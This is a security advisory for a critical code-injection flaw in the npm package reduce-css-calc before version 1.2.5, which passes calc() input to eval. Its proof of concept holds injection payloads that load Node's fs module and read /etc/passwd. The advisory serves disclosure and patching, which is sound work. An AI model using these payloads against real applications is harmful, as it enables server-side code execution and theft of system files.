GHSA-4662-j96g-mv46

Suggest an improvement
Source
https://github.com/advisories/GHSA-4662-j96g-mv46
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/06/GHSA-4662-j96g-mv46/GHSA-4662-j96g-mv46.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-4662-j96g-mv46
Aliases
Published
2018-06-07T19:43:06Z
Modified
2023-11-08T03:58:11.888099Z
Summary
Arbitrary Code Injection in reduce-css-calc
Details

Affected versions of reduce-css-calc pass input directly to eval. If user input is passed into the calc function, this may result in cross-site scripting on the browser, or remote code execution on the server.

Proof of Concept

const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc(                       (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc(                       (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc(                       (fs['readFileSync']("/etc/passwd", "utf-8")))`));

Recommendation

Update to version 1.2.5 or later.

Database specific 
{
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-94"
    ],
    "severity": "CRITICAL",
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T20:57:38Z"
}
References

Affected packages

npm / reduce-css-calc

Package

Name
reduce-css-calc
View open source insights on deps.dev
Purl
pkg:npm/reduce-css-calc

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.2.5